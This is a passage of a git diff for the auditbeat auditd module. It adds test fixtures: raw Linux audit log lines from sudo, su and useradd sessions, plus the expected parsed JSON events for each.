msg=audit(1610876676.623:459): pid=14178 uid=1002 auid=1002 ses=15 msg='op=PAM:accounting acct=\"alice\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 14178 + }, + "related": { + "user": [ + "alice", + "oldbob" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "1001", + "name": "alice" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "cmd": "bash", + "terminal": "pts/1" + }, + "message_type": "user_cmd", + "result": "success", + "sequence": 460, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "oldbob" + }, + "object": { + "primary": "bash", + "type": "process" + } + } + }, + "event": { + "action": "ran-command", + "category": [ + "process" + ], + "kind": "event", + "original": [ + "type=USER_CMD msg=audit(1610876676.623:460): pid=14178 uid=1002 auid=1002 ses=15 msg='cwd=\"/home/alice\" cmd=\"bash\" terminal=pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "process": { + "pid": 14178, + "working_directory": "/home/alice" + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "bob", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:setcred", + "terminal": "/dev/pts/1" + }, + "message_type": "cred_refr", + "result": "success", + "sequence": 461, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "bob" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "refreshed-credentials", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=CRED_REFR msg=audit(1610876676.623:461): pid=14178 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct=\"bob\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 14178 + }, + "related": { + "user": [ + "bob", + "oldbob" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "9999", + "name": "bob" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "bob", + "hostname": "localhost", + "op": "PAM:session_open", + "terminal": "/dev/pts/1" + }, + "message_type": "user_start", + "result": "success", + "sequence": 462, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "bob" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "started-session", + "category": [ + "session" + ], + "kind": "event", + "original": [ + "type=USER_START msg=audit(1610876676.623:462): pid=14178 uid=0 auid=1002 ses=15 msg='op=PAM:session_open acct=\"bob\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "network": { + "direction": "ingress" + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 14178 + }, + "related": { + "user": [ + "bob", + "oldbob" + ] + }, + "service": { + "type": "auditd" + }, + "source": { + "ip": "127.0.0.1" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "9999", + "name": "bob" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "alice", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:authentication", + "terminal": "/dev/pts/1" + }, + "message_type": "user_auth", + "result": "fail", + "sequence": 457, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "alice" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "authenticated", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_AUTH msg=audit(1610876634.103:457): pid=14178 uid=1002 auid=1002 ses=15 msg='op=PAM:authentication acct=\"alice\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=failed'" + ], + "outcome": "failure", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 14178 + }, + "related": { + "user": [ + "alice", + "oldbob" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "1001", + "name": "alice" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:setcred", + "terminal": "/dev/pts/1" + }, + "message_type": "cred_acq", + "result": "success", + "sequence": 434, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "root" + }, + "how": "/bin/su", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "acquired-credentials", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=CRED_ACQ msg=audit(1610735886.818:434): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct=\"root\" exe=\"/bin/su\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/bin/su", + "pid": 11792 + }, + "related": { + "user": [ + "oldbob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:accounting", + "terminal": "/dev/pts/1" + }, + "message_type": "user_acct", + "result": "success", + "sequence": 433, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "root" + }, + "how": "/bin/su", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "was-authorized", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_ACCT msg=audit(1610735886.818:433): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:accounting acct=\"root\" exe=\"/bin/su\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/bin/su", + "pid": 11792 + }, + "related": { + "user": [ + "oldbob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:authentication", + "terminal": "/dev/pts/1" + }, + "message_type": "user_auth", + "result": "success", + "sequence": 432, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "root" + }, + "how": "/bin/su", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "authenticated", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_AUTH msg=audit(1610735886.818:432): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:authentication acct=\"root\" exe=\"/bin/su\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/bin/su", + "pid": 11792 + }, + "related": { + "user": [ + "oldbob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "hostname": "localhost", + "op": "PAM:session_open", + "terminal": "/dev/pts/1" + }, + "message_type": "user_start", + "result": "success", + "sequence": 431, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "root" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "started-session", + "category": [ + "session" + ], + "kind": "event", + "original": [ + "type=USER_START msg=audit(1610735886.818:431): pid=11791 uid=0 auid=1002 ses=15 msg='op=PAM:session_open acct=\"root\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "network": { + "direction": "ingress" + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 11791 + }, + "related": { + "user": [ + "oldbob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "source": { + "ip": "127.0.0.1" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:setcred", + "terminal": "/dev/pts/1" + }, + "message_type": "cred_refr", + "result": "success", + "sequence": 430, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "root" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "refreshed-credentials", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=CRED_REFR msg=audit(1610735886.818:430): pid=11791 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 11791 + }, + "related": { + "user": [ + "oldbob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "cmd": "su", + "terminal": "pts/1" + }, + "message_type": "user_cmd", + "result": "success", + "sequence": 429, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "oldbob" + }, + "object": { + "primary": "su", + "type": "process" + } + } + }, + "event": { + "action": "ran-command", + "category": [ + "process" + ], + "kind": "event", + "original": [ + "type=USER_CMD msg=audit(1610735886.818:429): pid=11791 uid=1002 auid=1002 ses=15 msg='cwd=\"/home/alice\" cmd=\"su\" terminal=pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "process": { + "pid": 11791, + "working_directory": "/home/alice" + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "alice", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:accounting", + "terminal": "/dev/pts/1" + }, + "message_type": "user_acct", + "result": "success", + "sequence": 428, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "alice" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "was-authorized", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_ACCT msg=audit(1610735886.818:428): pid=11791 uid=1002 auid=1002 ses=15 msg='op=PAM:accounting acct=\"alice\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 11791 + }, + "related": { + "user": [ + "alice", + "oldbob" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "1001", + "name": "alice" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "alice", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:authentication", + "terminal": "/dev/pts/1" + }, + "message_type": "user_auth", + "result": "success", + "sequence": 427, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "alice" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "authenticated", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_AUTH msg=audit(1610735886.818:427): pid=11791 uid=1002 auid=1002 ses=15 msg='op=PAM:authentication acct=\"alice\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 11791 + }, + "related": { + "user": [ + "alice", + "oldbob" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "1001", + "name": "alice" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "su", + "selected-context": "1234", + "terminal": "/dev/pts/1" + }, + "message_type": "user_role_change", + "result": "success", + "sequence": 436, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "root" + }, + "how": "/bin/su", + "object": { + "primary": "1234", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "changed-role-to", + "category": "mac", + "kind": "event", + "original": [ + "type=USER_ROLE_CHANGE msg=audit(1610735886.822:436): pid=11793 uid=0 auid=1002 ses=15 msg='op=su acct=\"root\" exe=\"/bin/su\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success selected-context=1234'" + ], + "outcome": "success" + }, + "process": { + "executable": "/bin/su", + "pid": 11793 + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "id": "0", + "name": "root" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "hostname": "localhost", + "op": "PAM:session_open", + "terminal": "/dev/pts/1" + }, + "message_type": "user_start", + "result": "success", + "sequence": 435, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "root" + }, + "how": "/bin/su", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "started-session", + "category": [ + "session" + ], + "kind": "event", + "original": [ + "type=USER_START msg=audit(1610735886.822:435): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:session_open acct=\"root\" exe=\"/bin/su\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "network": { + "direction": "ingress" + }, + "process": { + "executable": "/bin/su", + "pid": 11792 + }, + "related": { + "user": [ + "oldbob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "source": { + "ip": "127.0.0.1" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:setcred", + "terminal": "/dev/pts/1" + }, + "message_type": "cred_disp", + "result": "success", + "sequence": 440, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "root" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "disposed-credentials", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=CRED_DISP msg=audit(1610735949.474:440): pid=11791 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 11791 + }, + "related": { + "user": [ + "oldbob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:session_close", + "terminal": "/dev/pts/1" + }, + "message_type": "user_end", + "result": "success", + "sequence": 439, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "root" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "ended-session", + "category": [ + "session" + ], + "kind": "event", + "original": [ + "type=USER_END msg=audit(1610735949.474:439): pid=11791 uid=0 auid=1002 ses=15 msg='op=PAM:session_close acct=\"root\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "end" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 11791 + }, + "related": { + "user": [ + "oldbob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:setcred", + "terminal": "/dev/pts/1" + }, + "message_type": "cred_disp", + "result": "success", + "sequence": 438, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "root" + }, + "how": "/bin/su", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "disposed-credentials", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=CRED_DISP msg=audit(1610735949.474:438): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct=\"root\" exe=\"/bin/su\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/bin/su", + "pid": 11792 + }, + "related": { + "user": [ + "oldbob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "root", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:session_close", + "terminal": "/dev/pts/1" + }, + "message_type": "user_end", + "result": "success", + "sequence": 437, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "root" + }, + "how": "/bin/su", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "ended-session", + "category": [ + "session" + ], + "kind": "event", + "original": [ + "type=USER_END msg=audit(1610735949.474:437): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:session_close acct=\"root\" exe=\"/bin/su\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "end" + ] + }, + "process": { + "executable": "/bin/su", + "pid": 11792 + }, + "related": { + "user": [ + "oldbob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1002", + "name": "oldbob" + } + } +] \ No newline at end of file diff --git a/auditbeat/module/auditd/testdata/useradd.log b/auditbeat/module/auditd/testdata/useradd.log new file mode 100644 index 000000000000..3f99f5e3b41f --- /dev/null +++ b/auditbeat/module/auditd/testdata/useradd.log @@ -0,0 +1,8 @@ +type=ADD_GROUP msg=audit(1610903553.686:584): pid=2940 uid=0 auid=1000 ses=14 msg='op=adding group to /etc/group id=1004 exe="/usr/sbin/groupadd" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=ADD_GROUP msg=audit(1610903553.710:586): pid=2940 uid=0 auid=1000 ses=14 msg='op=adding group to /etc/gshadow id=1004 exe="/usr/sbin/groupadd" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=ADD_GROUP msg=audit(1610903553.710:587): pid=2940 uid=0 auid=1000 ses=14 msg='op= id=1004 exe="/usr/sbin/groupadd" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=ADD_USER msg=audit(1610903553.730:591): pid=2945 uid=0 auid=1000 ses=14 msg='op=adding user id=1004 exe="/usr/sbin/useradd" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=USER_ACCT msg=audit(1610903553.814:593): pid=2948 uid=0 auid=1000 ses=14 msg='pam_tally2 uid=1004 reset=0 exe="/sbin/pam_tally2" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/2 res=success' +type=USER_CHAUTHTOK msg=audit(1610903558.174:594): pid=2953 uid=0 auid=1000 ses=14 msg='op=PAM:chauthtok acct="charlie" exe="/usr/bin/passwd" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=USER_AUTH msg=audit(1610903558.178:595): pid=2954 uid=0 auid=1000 ses=14 msg='op=PAM:authentication acct="root" exe="/usr/bin/chfn" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=USER_ACCT msg=audit(1610903558.178:596): pid=2954 uid=0 auid=1000 ses=14 msg='op=PAM:accounting acct="root" exe="/usr/bin/chfn" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' diff --git a/auditbeat/module/auditd/testdata/useradd.log-expected.json b/auditbeat/module/auditd/testdata/useradd.log-expected.json new file mode 100644 index 000000000000..b737a91893b1 --- /dev/null +++ b/auditbeat/module/auditd/testdata/useradd.log-expected.json @@ -0,0 +1,551 @@ +[ + { + "auditd": { + "data": { + "addr": "127.0.0.1", + "hostname": "ubuntu-bionic", + "id": "1004", + "op": "adding", + "terminal": "pts/2" + }, + "message_type": "add_group", + "result": "success", + "sequence": 584, + "session": "14", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "root" + }, + "how": "/usr/sbin/groupadd", + "object": { + "primary": "1004", + "type": "account" + } + } + }, + "event": { + "action": "added-group-account-to", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=ADD_GROUP msg=audit(1610903553.686:584): pid=2940 uid=0 auid=1000 ses=14 msg='op=adding group to /etc/group id=1004 exe=\"/usr/sbin/groupadd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'" + ], + "outcome": "success", + "type": [ + "group", + "creation" + ] + }, + "group": { + "id": "1004", + "name": "testgroup" + }, + "process": { + "executable": "/usr/sbin/groupadd", + "pid": 2940 + }, + "related": { + "user": [ + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant" + } + }, + { + "auditd": { + "data": { + "addr": "127.0.0.1", + "hostname": "ubuntu-bionic", + "id": "1004", + "op": "adding", + "terminal": "pts/2" + }, + "message_type": "add_group", + "result": "success", + "sequence": 586, + "session": "14", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "root" + }, + "how": "/usr/sbin/groupadd", + "object": { + "primary": "1004", + "type": "account" + } + } + }, + "event": { + "action": "added-group-account-to", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=ADD_GROUP msg=audit(1610903553.710:586): pid=2940 uid=0 auid=1000 ses=14 msg='op=adding group to /etc/gshadow id=1004 exe=\"/usr/sbin/groupadd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'" + ], + "outcome": "success", + "type": [ + "group", + "creation" + ] + }, + "group": { + "id": "1004", + "name": "testgroup" + }, + "process": { + "executable": "/usr/sbin/groupadd", + "pid": 2940 + }, + "related": { + "user": [ + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant" + } + }, + { + "auditd": { + "data": { + "addr": "127.0.0.1", + "hostname": "ubuntu-bionic", + "id": "1004", + "terminal": "pts/2" + }, + "message_type": "add_group", + "result": "success", + "sequence": 587, + "session": "14", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "root" + }, + "how": "/usr/sbin/groupadd", + "object": { + "primary": "1004", + "type": "account" + } + } + }, + "event": { + "action": "added-group-account-to", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=ADD_GROUP msg=audit(1610903553.710:587): pid=2940 uid=0 auid=1000 ses=14 msg='op= id=1004 exe=\"/usr/sbin/groupadd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'" + ], + "outcome": "success", + "type": [ + "group", + "creation" + ] + }, + "group": { + "id": "1004", + "name": "testgroup" + }, + "process": { + "executable": "/usr/sbin/groupadd", + "pid": 2940 + }, + "related": { + "user": [ + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant" + } + }, + { + "auditd": { + "data": { + "addr": "127.0.0.1", + "hostname": "ubuntu-bionic", + "id": "1004", + "op": "adding", + "terminal": "pts/2" + }, + "message_type": "add_user", + "result": "success", + "sequence": 591, + "session": "14", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "root" + }, + "how": "/usr/sbin/useradd", + "object": { + "primary": "1004", + "type": "account" + } + } + }, + "event": { + "action": "added-user-account", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=ADD_USER msg=audit(1610903553.730:591): pid=2945 uid=0 auid=1000 ses=14 msg='op=adding user id=1004 exe=\"/usr/sbin/useradd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'" + ], + "outcome": "success", + "type": [ + "user", + "creation" + ] + }, + "process": { + "executable": "/usr/sbin/useradd", + "pid": 2945 + }, + "related": { + "user": [ + "root", + "testuser", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "target": { + "id": "1004", + "name": "testuser" + } + } + }, + { + "auditd": { + "data": { + "addr": "127.0.0.1", + "hostname": "localhost", + "reset": "0", + "terminal": "/dev/pts/2" + }, + "message_type": "user_acct", + "result": "success", + "sequence": 593, + "session": "14", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "testuser" + }, + "how": "/sbin/pam_tally2", + "object": { + "primary": "/dev/pts/2", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "was-authorized", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_ACCT msg=audit(1610903553.814:593): pid=2948 uid=0 auid=1000 ses=14 msg='pam_tally2 uid=1004 reset=0 exe=\"/sbin/pam_tally2\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/2 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/sbin/pam_tally2", + "pid": 2948 + }, + "related": { + "user": [ + "testuser", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "1004", + "name": "testuser" + }, + "id": "1000", + "name": "vagrant" + } + }, + { + "auditd": { + "data": { + "acct": "charlie", + "addr": "127.0.0.1", + "hostname": "ubuntu-bionic", + "op": "PAM:chauthtok", + "terminal": "pts/2" + }, + "message_type": "user_chauthtok", + "result": "success", + "sequence": 594, + "session": "14", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "charlie" + }, + "how": "/usr/bin/passwd", + "object": { + "primary": "pts/2", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "changed-password", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=USER_CHAUTHTOK msg=audit(1610903558.174:594): pid=2953 uid=0 auid=1000 ses=14 msg='op=PAM:chauthtok acct=\"charlie\" exe=\"/usr/bin/passwd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'" + ], + "outcome": "success", + "type": [ + "user", + "change" + ] + }, + "process": { + "executable": "/usr/bin/passwd", + "pid": 2953 + }, + "related": { + "user": [ + "charlie", + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "target": { + "id": "1003", + "name": "charlie" + } + } + }, + { + "auditd": { + "data": { + "acct": "root", + "addr": "127.0.0.1", + "hostname": "ubuntu-bionic", + "op": "PAM:authentication", + "terminal": "pts/2" + }, + "message_type": "user_auth", + "result": "success", + "sequence": 595, + "session": "14", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "root" + }, + "how": "/usr/bin/chfn", + "object": { + "primary": "pts/2", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + 